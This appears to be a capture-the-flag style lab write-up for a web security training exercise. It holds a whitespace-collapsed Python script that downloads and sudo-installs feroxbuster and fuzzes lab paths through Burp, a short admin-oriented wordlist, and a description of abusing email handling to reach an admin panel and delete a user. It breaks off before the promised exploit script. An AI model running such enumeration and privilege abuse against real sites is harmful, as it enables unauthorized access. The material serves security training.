Access the lab, add the domain to Burp’s Target scope and check Include subdomains. View / route source page and inspect the page, then request all embedded links via Burp proxy using the scripts below.
importosimportplatformimportsubprocessimportsysdefcheck_binary(binary_name):ifsys.platform.startswith('linux')orsys.platform.startswith('darwin'):command=['which',binary_name]elifsys.platform.startswith('win'):command=['where',binary_name]else:print("Unsupported operating system")returntry:subprocess.check_output(command)returnTrueexceptsubprocess.CalledProcessError:print(f"{binary_name} is not installed.")returnFalsedefinstall_binary(binary_url,binary_name):os_name=platform.system().lower()binary_file=f"{binary_name}.zip"ifos_name=='windows'elsef"{binary_name}.tar.gz"# Check if binary existsifnotcheck_binary(binary_name):# Download Binary File if not existifnotos.path.exists(binary_file):ifos_name=='linux':download_command=f"curl -L {binary_url}/x86_64-linux-{binary_name}.tar.gz -o {binary_file}"elifos_name=='darwin':download_command=f"curl -L {binary_url}/x86_64-macos-{binary_name}.tar.gz -o {binary_file}"elifsys.platform.startswith('win'):download_command=f"powershell -Command 'Invoke-WebRequest {binary_url}/x86_64-windows-{binary_name}.exe.zip -OutFile {binary_file}'"else:print("Unsupported operating system")returntry:subprocess.run(download_command,shell=True,check=True)print(f"{binary_name} downloaded successfully")exceptsubprocess.CalledProcessErrorase:print(f"Failed to download {binary_name}: {e}")# Install Binaryifos.path.exists(binary_file):ifos_namein['linux','darwin']:extract_command=f"sudo tar -C /usr/local/bin/ -xzf {binary_file}{binary_name} && sudo chmod 775 /usr/local/bin/{binary_name}"elifsys.platform.startswith('win'):extract_command=f"Powershell -Command \"Expand-Archive -Path {binary_file} -DestinationPath . ; Move-Item -Path .\\{binary_name}.exe -Destination 'C:\\Windows\\'\""else:print("Unsupported operating system")returntry:subprocess.run(extract_command,shell=True,check=True)print(f"{binary_name} installed successfully")exceptsubprocess.CalledProcessErrorase:print(f"Failed to install {binary_name}: {e}")# Clean up downloaded binary filetry:cleanup_command=f"rm {binary_file}"ifos_name!='windows'elsef"del {binary_file}"subprocess.run(cleanup_command,shell=True,check=True)print(f"Cleaned up {binary_file}")exceptsubprocess.CalledProcessErrorase:print(f"Failed to clean up {binary_file}: {e}")else:print(f"{binary_name} is already installed.")defenumerate_path(endpoint,wordlist_path):print("Enumerating paths...")fuzz_command=f"feroxbuster -u {endpoint} -w {wordlist_path} -C 404 --proxy http://127.0.0.1:8080 --insecure --quiet --no-state --auto-tune"process=subprocess.Popen(fuzz_command.split(),stdout=subprocess.PIPE,stderr=subprocess.STDOUT,text=True)forlineinprocess.stdout:print(line.strip())defmain():binary_url="https://github.com/epi052/feroxbuster/releases/download/v2.10.2"binary_name="feroxbuster"endpoint="https://0abf002f043f115b801d992a002a0035.web-security-academy.net/"wordlist_path="wordlist.txt"install_binary(binary_url,binary_name)enumerate_path(endpoint,wordlist_path)if__name__=="__main__":main()
The custom word list used for the above enumeration.
1
2
3
4
5
6
7
accounts
admin
administrator
api
users
products
product
Exploration
Stacking BurpSuite and the Browser with FoxyProxy extension for Burp turned on, explore the application by registering an account and logging into the application. Observe that there is no email update feature.
Exploitation
We can explore buffer overflow to force our email to have the @dontwannacry.com email host after which the ‘Admin Panel’ tab becomes active. Click on it then delete the Carlos user. This exploit can be automated with the script below